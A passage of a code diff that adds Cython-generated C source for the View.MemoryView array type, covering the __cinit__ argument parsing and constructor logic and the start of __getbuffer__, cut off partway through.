+ else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_itemsize)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 1); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_format)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 2); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_mode); + if (value) { values[3] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_allocate_buffer); + if (value) { values[4] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 131, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_shape = ((PyObject*)values[0]); + __pyx_v_itemsize = __Pyx_PyIndex_AsSsize_t(values[1]); if (unlikely((__pyx_v_itemsize == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_v_format = values[2]; + __pyx_v_mode = values[3]; + if (values[4]) { + __pyx_v_allocate_buffer = __Pyx_PyObject_IsTrue(values[4]); if (unlikely((__pyx_v_allocate_buffer == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 132, __pyx_L3_error) + } else { + + /* "View.MemoryView":132 + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, + * mode="c", bint allocate_buffer=True): # <<<<<<<<<<<<<< + * + * cdef int idx + */ + __pyx_v_allocate_buffer = ((int)1); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, __pyx_nargs); __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_shape), (&PyTuple_Type), 1, "shape", 1))) __PYX_ERR(1, 131, __pyx_L1_error) + if (unlikely(((PyObject *)__pyx_v_format) == Py_None)) { + PyErr_Format(PyExc_TypeError, "Argument '%.200s' must not be None", "format"); __PYX_ERR(1, 131, __pyx_L1_error) + } + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v_shape, __pyx_v_itemsize, __pyx_v_format, __pyx_v_mode, __pyx_v_allocate_buffer); + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer) { + int __pyx_v_idx; + Py_ssize_t __pyx_v_dim; + char __pyx_v_order; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + char *__pyx_t_8; + Py_ssize_t __pyx_t_9; + Py_UCS4 __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + __Pyx_INCREF(__pyx_v_format); + + /* "View.MemoryView":137 + * cdef Py_ssize_t dim + * + * self.ndim = len(shape) # <<<<<<<<<<<<<< + * self.itemsize = itemsize + * + */ + if (unlikely(__pyx_v_shape == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 137, __pyx_L1_error) + } + __pyx_t_1 = PyTuple_GET_SIZE(__pyx_v_shape); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(1, 137, __pyx_L1_error) + __pyx_v_self->ndim = ((int)__pyx_t_1); + + /* "View.MemoryView":138 + * + * self.ndim = len(shape) + * self.itemsize = itemsize # <<<<<<<<<<<<<< + * + * if not self.ndim: + */ + __pyx_v_self->itemsize = __pyx_v_itemsize; + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + __pyx_t_2 = (!(__pyx_v_self->ndim != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":141 + * + * if not self.ndim: + * raise ValueError, "Empty shape tuple for cython.array" # <<<<<<<<<<<<<< + * + * if itemsize <= 0: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Empty_shape_tuple_for_cython_arr, 0, 0); + __PYX_ERR(1, 141, __pyx_L1_error) + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + } + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + __pyx_t_2 = (__pyx_v_itemsize <= 0); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":144 + * + * if itemsize <= 0: + * raise ValueError, "itemsize <= 0 for cython.array" # <<<<<<<<<<<<<< + * + * if not isinstance(format, bytes): + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_itemsize_0_for_cython_array, 0, 0); + __PYX_ERR(1, 144, __pyx_L1_error) + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + } + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + __pyx_t_2 = PyBytes_Check(__pyx_v_format); + __pyx_t_3 = (!__pyx_t_2); + if (__pyx_t_3) { + + /* "View.MemoryView":147 + * + * if not isinstance(format, bytes): + * format = format.encode('ASCII') # <<<<<<<<<<<<<< + * self._format = format # keep a reference to the byte string + * self.format = self._format + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_format, __pyx_n_s_encode); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_n_s_ASCII}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __Pyx_DECREF_SET(__pyx_v_format, __pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + } + + /* "View.MemoryView":148 + * if not isinstance(format, bytes): + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string # <<<<<<<<<<<<<< + * self.format = self._format + * + */ + if (!(likely(PyBytes_CheckExact(__pyx_v_format))||((__pyx_v_format) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_v_format))) __PYX_ERR(1, 148, __pyx_L1_error) + __pyx_t_4 = __pyx_v_format; + __Pyx_INCREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __Pyx_GOTREF(__pyx_v_self->_format); + __Pyx_DECREF(__pyx_v_self->_format); + __pyx_v_self->_format = ((PyObject*)__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":149 + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + * self.format = self._format # <<<<<<<<<<<<<< + * + * + */ + if (unlikely(__pyx_v_self->_format == Py_None)) { + PyErr_SetString(PyExc_TypeError, "expected bytes, NoneType found"); + __PYX_ERR(1, 149, __pyx_L1_error) + } + __pyx_t_8 = __Pyx_PyBytes_AsWritableString(__pyx_v_self->_format); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(1, 149, __pyx_L1_error) + __pyx_v_self->format = __pyx_t_8; + + /* "View.MemoryView":152 + * + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) # <<<<<<<<<<<<<< + * self._strides = self._shape + self.ndim + * + */ + __pyx_v_self->_shape = ((Py_ssize_t *)PyObject_Malloc((((sizeof(Py_ssize_t)) * __pyx_v_self->ndim) * 2))); + + /* "View.MemoryView":153 + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) + * self._strides = self._shape + self.ndim # <<<<<<<<<<<<<< + * + * if not self._shape: + */ + __pyx_v_self->_strides = (__pyx_v_self->_shape + __pyx_v_self->ndim); + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + __pyx_t_3 = (!(__pyx_v_self->_shape != 0)); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":156 + * + * if not self._shape: + * raise MemoryError, "unable to allocate shape and strides." # <<<<<<<<<<<<<< + * + * + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_shape_and_str, 0, 0); + __PYX_ERR(1, 156, __pyx_L1_error) + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + } + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + __pyx_t_7 = 0; + __pyx_t_4 = __pyx_v_shape; __Pyx_INCREF(__pyx_t_4); __pyx_t_1 = 0; + for (;;) { + if (__pyx_t_1 >= PyTuple_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_5); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(1, 159, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_5); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_9; + __pyx_v_idx = __pyx_t_7; + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + __pyx_t_3 = (__pyx_v_dim <= 0); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":161 + * for idx, dim in enumerate(shape): + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." # <<<<<<<<<<<<<< + * self._shape[idx] = dim + * + */ + __pyx_t_5 = PyTuple_New(5); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_9 = 0; + __pyx_t_10 = 127; + __Pyx_INCREF(__pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_9 += 22; + __Pyx_GIVEREF(__pyx_kp_u_Invalid_shape_in_axis); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_6 = __Pyx_PyUnicode_From_int(__pyx_v_idx, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u__4); + __pyx_t_9 += 2; + __Pyx_GIVEREF(__pyx_kp_u__4); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u__4); + __pyx_t_6 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u__3); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__3); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u__3); + __pyx_t_6 = __Pyx_PyUnicode_Join(__pyx_t_5, 5, __pyx_t_9, __pyx_t_10); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 161, __pyx_L1_error) + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + } + + /* "View.MemoryView":162 + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim # <<<<<<<<<<<<<< + * + * cdef char order + */ + (__pyx_v_self->_shape[__pyx_v_idx]) = __pyx_v_dim; + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_c, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 165, __pyx_L1_error) + if (__pyx_t_3) { + + /* "View.MemoryView":166 + * cdef char order + * if mode == 'c': + * order = b'C' # <<<<<<<<<<<<<< + * self.mode = u'c' + * elif mode == 'fortran': + */ + __pyx_v_order = 'C'; + + /* "View.MemoryView":167 + * if mode == 'c': + * order = b'C' + * self.mode = u'c' # <<<<<<<<<<<<<< + * elif mode == 'fortran': + * order = b'F' + */ + __Pyx_INCREF(__pyx_n_u_c); + __Pyx_GIVEREF(__pyx_n_u_c); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_c; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_fortran, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 168, __pyx_L1_error) + if (likely(__pyx_t_3)) { + + /* "View.MemoryView":169 + * self.mode = u'c' + * elif mode == 'fortran': + * order = b'F' # <<<<<<<<<<<<<< + * self.mode = u'fortran' + * else: + */ + __pyx_v_order = 'F'; + + /* "View.MemoryView":170 + * elif mode == 'fortran': + * order = b'F' + * self.mode = u'fortran' # <<<<<<<<<<<<<< + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + */ + __Pyx_INCREF(__pyx_n_u_fortran); + __Pyx_GIVEREF(__pyx_n_u_fortran); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_fortran; + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":172 + * self.mode = u'fortran' + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" # <<<<<<<<<<<<<< + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + */ + /*else*/ { + __pyx_t_4 = __Pyx_PyObject_FormatSimple(__pyx_v_mode, __pyx_empty_unicode); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __Pyx_PyUnicode_Concat(__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_t_4); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 172, __pyx_L1_error) + } + __pyx_L11:; + + /* "View.MemoryView":174 + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) # <<<<<<<<<<<<<< + * + * self.free_data = allocate_buffer + */ + __pyx_v_self->len = __pyx_fill_contig_strides_array(__pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_itemsize, __pyx_v_self->ndim, __pyx_v_order); + + /* "View.MemoryView":176 + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + * + * self.free_data = allocate_buffer # <<<<<<<<<<<<<< + * self.dtype_is_object = format == b'O' + * + */ + __pyx_v_self->free_data = __pyx_v_allocate_buffer; + + /* "View.MemoryView":177 + * + * self.free_data = allocate_buffer + * self.dtype_is_object = format == b'O' # <<<<<<<<<<<<<< + * + * if allocate_buffer: + */ + __pyx_t_6 = PyObject_RichCompare(__pyx_v_format, __pyx_n_b_O, Py_EQ); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 177, __pyx_L1_error) + __pyx_t_3 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 177, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_v_self->dtype_is_object = __pyx_t_3; + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + if (__pyx_v_allocate_buffer) { + + /* "View.MemoryView":180 + * + * if allocate_buffer: + * _allocate_buffer(self) # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_t_7 = __pyx_array_allocate_buffer(__pyx_v_self); if (unlikely(__pyx_t_7 == ((int)-1))) __PYX_ERR(1, 180, __pyx_L1_error) + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + } + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_format); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(((struct __pyx_array_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_v_bufmode; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + char *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + Py_ssize_t *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":184 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 # <<<<<<<<<<<<<< + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + */ + __pyx_v_bufmode = -1; + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_t_1 = ((__pyx_v_flags & ((PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS) | PyBUF_ANY_CONTIGUOUS)) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_c, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 186, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":187 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_v_bufmode = (PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + goto __pyx_L4; + } + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_fortran, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 188, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":189 + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + */ + __pyx_v_bufmode = (PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + } + __pyx_L4:; + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + __pyx_t_1 = (!((__pyx_v_flags & __pyx_v_bufmode) != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":191 + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + * raise 